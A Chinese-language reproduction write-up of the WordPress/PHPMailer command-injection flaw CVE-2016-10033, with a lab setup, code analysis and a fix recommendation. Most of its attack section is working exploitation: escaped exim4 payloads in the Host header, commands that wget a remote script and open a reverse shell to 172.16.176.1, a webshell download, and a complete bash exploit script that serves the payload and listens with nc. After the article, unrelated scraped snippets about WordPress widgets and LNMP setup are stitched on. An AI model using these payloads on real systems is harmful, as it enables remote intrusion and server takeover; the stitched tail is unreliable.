WordPress <= 4.6 命令执行漏洞(PHPMailer)复现分析

漏洞信息

WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。

漏洞编号

CVE-2016-10033

影响版本

WordPress <= 4.7.1 PHPMailer < 5.2.18

测试环境

  1. 拉取镜像到本地
$ docker pull medicean/vulapps:w_wordpress_6
  1. 启动环境
$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_6

-p 8000:80 前面的 8000 代表物理机的端口,可随意指定。

访问 http://127.0.0.1:8000 看到 WordPress 主界面代表启动成功

漏洞分析

漏洞页面:/wp-login.php?action=lostpassword

此处是管理员重置密码页面,wordpress使用phpmailer组件进行重置密码邮件的发送,但是phpmailer < 5.2.18之前的版本存在命令注入漏洞,具体你可以先阅读分析文章链接

我们来看看这个漏洞在wordpress中的情况。漏洞文件是class.phpmailer.php,我们在wordpress中搜索查看这个文件,该文件在在wp-includes目录下。我们可以发现几行关键代码:

/**
     * Which method to use to send mail.
     * Options: "mail", "sendmail", or "smtp".
     * @var string
     */
    public $Mailer = 'mail';

    /**
     * The path to the sendmail program.
     * @var string
     */
    public $Sendmail = '/usr/sbin/sendmail';

我们发现,实际上phpmailer组件是调用linux系统命令sendmail进行邮件发送,命令格式为:sendmail -t -i [email protected]。并且我们继续审计代码发现:

    /**
     * Get the server hostname.
     * Returns 'localhost.localdomain' if unknown.
     * @access protected
     * @return string
     */
    protected function serverHostname()
    {
        $result = 'localhost.localdomain';
        if (!empty($this->Hostname)) {
            $result = $this->Hostname;
        } elseif (isset($_SERVER) and array_key_exists('SERVER_NAME', $_SERVER) and !empty($_SERVER['SERVER_NAME'])) {
            $result = $_SERVER['SERVER_NAME'];
        } elseif (function_exists('gethostname') && gethostname() !== false) {
            $result = gethostname();
        } elseif (php_uname('n') !== false) {
            $result = php_uname('n');
        }
        return $result;
    }

serverHostname函数通过传入的SERVER_NAME参数来获取主机名,该主机名即HTTP请求报文中的host值,但是SERVER_NAME参数并没有经过任何过滤,因此我们可以进行任意构造拼接,从而产生了系统命令注入漏洞。

更棒的是,sendmail 提供了-O-X参数,-X参数用于写入日志文件, 我们可以使用-OQueueDirectory=/tmp/ -X/tmp/smtp.php命令组合,它会将发送的邮件保存到/tmp/smtp.php中, 那么在请求的时候payload应该类似于这样:

POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: aaa( -X/tmp/smtp.php )@qq.com

在@前面,如果加上括号,将可以引入空格,这样就可以拼接到了sendmail命令中并且保存了测试邮件文件。那么如果我们写入的是Webshell后门文件呢?

思路很好,然而现实很无奈。

  • wordpress方面以及PHPMailer库方面都会防止攻击者注入空字符(空格或TAB)到sendmail命令中。并且,添加括号引入向sendmail中注入参数的方法已经行不通了,具体可以参考链接
  • 比如我们想要调用/bin/touch的时候也会出问题,因为host字段中如果出现/,服务器会拒绝我们的请求。

因此上述的Sendmail技术在这种情况下不起作用,这条路走不通了!

正感觉走投无路的时候,这时候我们不妨喝杯茶冷静一下,为什么sendmail能够产生命令注入漏洞呢?我们去了解一下sendmail。然后就会发现柳暗花明又一村了。我们可以知道ubuntu/debain系统中,已经使用exim4替代了sendmail的功能,我们查看sendmail文件可以发现它是一个链向exim4的软链接文件。

那么我们可以利用exim4的语法参数进行命令执行参数的拼接啊!我们查看exim4的帮助手册,可以发现-be参数

Run Exim in expansion testing mode. Exim  discards  its  root
                 privilege,  to prevent ordinary users from using this mode to
                 read otherwise inaccessible files. If no arguments are given,
                 Exim  runs interactively, prompting for lines of data. Other‐
                 wise, it processes each argument in turn.

                 If Exim was built with USE_READLINE=yes in Local/Makefile, it
                 tries  to  load  the libreadline library dynamically whenever
                 the -be option is used without  command  line  arguments.  If
                 successful,  it  uses the readline() function, which provides
                 extensive line-editing facilities, for reading the test data.
                 A line history is supported.

                 Long expansion expressions can be split over several lines by
                 using backslash continuations. As in Exim's run time configu‐
                 ration,  white  space  at  the start of continuation lines is
                 ignored. Each argument or data line  is  passed  through  the
                 string  expansion  mechanism, and the result is output. Vari‐
                 able values from the configuration file (for example,  $qual‐
                 ify_domain)  are  available,  but  no message-specific values
                 (such as $message_exim_id) are set,  because  no  message  is
                 being processed (but see -bem and -Mset).

                 Note:  If  you  use  this  mechanism to test lookups, and you
                 change the data files or databases you are  using,  you  must
                 exit  and  restart  Exim before trying the same lookup again.
                 Otherwise, because each Exim process caches  the  results  of
                 lookups,  you will just get the same result as before.  Macro
                 processing is done  on  lines  before  string-expansion:  new
                 macros  can  be defined and macros will be expanded.  Because
                 macros in the config file are often used for  secrets,  those
                 are only available to admin users.

简单来说,-be参数是一个字符串拓展测试命令,它可以读取一些变量的数据。比如,$tod_log,它可以显示系统时间。

~$ sendmail -be '$tod_log'
2018-04-20 16:26:47

并且,exim4提供了一些函数用来执行一些命令,如字符串截取函数substr$run系统调用函数。

我们可以截取空格字符。如图所示,substr函数从第十个字符开始截取,共截取一个字符,也就是时间字符串的第11个字符,是空格字符。

那么同理,我们也可以截取/字符串:

我们测试使用$run函数调用系统命令

到这里,遇到的问题都解决了,我们于是可以构造payload如下,该payload在/tmp/目录下创建test.txt文件:

aa(any [email protected] -be ${run{/bin/touch /tmp/test.txt}} null)

空格 ==> \({substr{10}{1}{\)tod_log}}

/ ==> \({substr{0}{1}{\)spool_directory}}

转换过来就是

aa(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)

我们去密码重置页面输入重置用户名为admin,提交之后拦截请求,并把host的值修改为我们的payload:

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: aa(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.176.128:8000/wp-login.php?action=lostpassword
Cookie: wordpress_test_cookie=WP+Cookie+check
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

user_login=admin&redirect_to=&wp-submit=Get+New+Password

提交请求:

在/tmp目录下发现成功生成了测试文件。

执行任意命令

实际上我们按照刚才的思路,替换我们想要执行的命令即可。但实际利用起来,还是有些需要注意的地方:

  • 执行的命令不能包含大量特殊字符,如 :、引号等。
  • 命令会被转换成小写字母
  • 命令需要使用绝对路径
  • 需要知道某一个存在的用户的用户名

写入shell

反弹shell

思路是利用curl或者wget命令下载远程文件。这里我测试下载执行一个反弹bash脚本。需要注意的地方:

  • 远程 URL 中不能有 http://
  • 所有字母必须小写

?

远程反弹shell脚本:172.16.176.1:8080/a.txt,内容:

nohup bash -i >/dev/tcp/172.16.176.1/1337 0<&1 2>&1) &

payload:

aa(any [email protected] -be ${run{/usr/bin/wget --output-document /tmp/rce 172.16.176.1/a.txt}} null)

执行反弹shell:

aa(any [email protected] -be ${run{/bin/bash /tmp/rce}} null)

两个payload转换过来就是

aa(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}172.16.176.1${substr{0}{1}{$spool_directory}}a.txt}} null)

aa(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)

在反弹主机上用nc监听1337端口,分别按顺序提交payload即可获取到反弹shell

nc -nvv -l -p 1337

写入一句话webshell

同理,可以直接下载一句话webshell,然后菜刀连接。payload:

payload:

aa(any [email protected] -be ${run{/usr/bin/wget --output-document a.php 172.16.176.1/a.txt}} null)

转换过来即

aa(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}a.php${substr{10}{1}{$tod_log}}172.16.176.1${substr{0}{1}{$spool_directory}}a.txt}} null)

POC

自动化提交payload,获取反弹shell。通过python -mSimpleHTTPServer 80建立web服务,用于目标下载shell。运行是需要用管理员权限,因为监听了80端口。

使用方法

sudo ./wordpress-rce-exploit.sh http://172.16.176.128:8000
#!/bin/bash
#
#      __                     __   __  __           __
#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
#            /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
#                        .;lc'
#                    .,cdkkOOOko;.
#                 .,lxxkkkkOOOO000Ol'
#             .':oxxxxxkkkkOOOO0000KK0x:'
#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
#     .dxxxxxdl;. .,               .. .;cdxxxxxx:
#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
#             .':oxxxxxxxxx.ckkkkkkkkxl,.
#                 .,cdxxxxx.ckkkkkxc.
#                    .':odx.ckxl,.
#                        .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------

rev_host="172.16.176.1"

function prep_host_header() {
      cmd="$1"
      rce_cmd="\${run{$cmd}}";

      # replace / with ${substr{0}{1}{$spool_directory}}
      #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

      # replace ' ' (space) with
      #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
      #return "target(any [email protected] -be $rce_cmd null)"
      host_header="target(any [email protected] -be $rce_cmd null)"
      return 0
}

#cat exploitbox.ans
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro"  | base64 -d
echo "$intro2" | base64 -d

if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo

if [ "$choice" == "y" ]; then

echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
echo -e "\e[92m[+]\033[0m Connected to the target"

# Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!

# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"

# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"

echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -nvv -l -p 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0

fi

echo "Exiting..."
exit 0

修复建议

更新wordpress、phpmailer到最新版本

参考链接

https://paper.seebug.org/161/

http://bobao.360.cn/news/detail/4146.html

http://vulapps.evalbug.com/w_wordpress_6/

https://github.com/opsxcq/exploit-CVE-2016-10033

https://github.com/vulhub/vulhub/tree/master/wordpress/pwnscriptum

原文地址:https://www.cnblogs.com/ssooking/p/8893264.html

时间: 2024-10-09 11:48:44

WordPress <= 4.6 命令执行漏洞(PHPMailer)复现分析的相关文章

WordPress窗体化侧边栏

窗体化侧边栏是一个支持 Widget 的侧边栏或者说是窗体化(widgetized)的侧边栏几乎是 WordPress 主题的标准. 首先,什么是窗体化(widgetizing)呢?简单的说,窗体化就是能够通过拖拉就能够整理侧边栏的模块.比如我们需要更改分类和存档的位置,只需要简单把分类和存档列表拖到它们的位置即可,根本不用去修改侧边栏的代码. 教程地址:http://blog.wpjam.com/m/wp-theme-lesson-6e-widgetizing-sidebar/

samba共享目录构建wordpress与mysql

项目一 (1) 使用samba共享/data/application/web,在目录中提供wordpress; (2) 使用samba客户端挂载samba server共享的目录至/var/www/html: (3) 客户端(lamp),部署wordpress,并让其正常访问:要确保能正常发文章,上传图片: (4) 客户端2(lamp),挂载samba server共享的目录至/var/www/html:验正其wordpress是否可被访   问:要确保能正常发文章,上传图片: samba服务器

WordPress解决优酷、土豆视频移动端观看问题并自适应

转:https://www.xhsay.com/wp-iframe-handler-youku-tudou.html 虽然WordPress能直接插入优酷.土豆的视频但是无法在移动端观看,于是乎笨笨就开始各种折腾终于找到了合适的解决办法另外在说一句支持移动端自适应哦. 函数代码 在主题函数文件function.php里面添加以下代码即可,保证在最后一个?>之前就好了 //Youku function wp_iframe_handler_youku($matches, $attr, $url, $

WordPress版微信小程序2.2.0版发布

2017年8月12日WordPress版微信小程序2.2.0版通过了微信的审核正式发布,此版本的更新以完善功能为主.主要更新的功能是:站内链接,猜你喜欢,热点文章. WordPress版微信小程序开放源码地址:https://github.com/iamxjb/winxin-app-watch-life.net 了解程序的开发历程及开发技术,建议看看相关版本的更新文章: 1.用微信小程序连接WordPress网站 2.WordPress版微信小程序1.5版本发布 3.WordPress版微信小程

WordPress主循环(The Loop)函数have_posts(),the_post()详解

WordPress中调用文章标题是the_title();调用文章内容时用到the_content();调用文章的作者时用到the_author();等等这些函数,都需要在主循环中使用,下面就介绍一下如何用have_posts()和the_post()开始Wordpress文章中循环,并说明如何结束循环. 语法 1 <?php if (have_posts()) :  while (have_posts()) : the_post(); ?> 2 当找到文章时返回此语句 3 <?php 

说说WordPress的主查询函数-query_posts()

今天说说WordPress 的主查询函数 -query_posts(),因为我正在制作的主题里面多次用到了这个函数 . query_posts()查询函数决定了哪些文章出现在WordPress 主 循环(loop)中,正因为如此,query_posts函数仅用于修改主页循环(Loop),而不是在页面上生成次级循环.如果你希望在主循环外另外生 成循环,应该新建独立的WP_Query对象,用这些对象生成循环.在主循环外的循环上使用query_posts会导致主循环运行偏差,并可能在页面上 显示出你不

wordpress博客站点配置及数据库迁移

1.wordpress博客站点部署配置 1.1 检查环境 1.1.1 nginx.conf配置文件 ###检查nginx配置文件 [[email protected] conf]# cat nginx.conf worker_processes 1; events { worker_connections  1024; } http { log_format  main  '$remote_addr - $remote_user [$time_local]"$request" ' '$

基于lamp+fastcgi+https搭建phpMyAdmin和wordpress

前言: lamp为网站搭建的很基本的一个架构,如果仅仅只是静态的网页文件,我们就可以通过基本的web服务器来处理.当我们需要处理动态内容时,比如把用户数据放在数据库,从数据库取出数据等等,我们就必须借助CGI连接到处理动态请求的应用.FastCGI作为一个常驻型的CGI,可以独立于apache服务,可以实现分布式的部署.接下来我们用一台 主机来搭建phpMyAdmin和wordpress,并且让wordpress实现https. 正文: 部署之前我们先简单介绍下我们用到的架构,不用多说lamp就

在使用WordPress建立商业网站时你需要了解的?

在玩WordPress的4年里,目睹WP的功能越来越强大的同时,也感受到了WordPress越来越臃肿复杂,不再是曾经众多博主所认为的简单易用,尤其对于很多完全陌生的新手来说,诸多WP专用的术语也一知半解,比如"自定义字段","自定义缩略图","自定义表单"--这么多的自定义也表明WordPress正逐渐走向一个强大的准CMS系统了,也正因为功能的强大和众多的开发者提供的资源,很多人开始选择用WordPress建立自己团队或者公司的垂直资讯网站或

lnmp部署wordpress和phpmyadmin

yum安装nginx php-fpm mariadb-server phpmyadmin php-mysql nginx.conf添加以下内容 location 下添加 index    index.php; location  ~ \.php$ {         root           html;                             fastcgi_pass   127.0.0.1:9000;         fastcgi_index  index.php;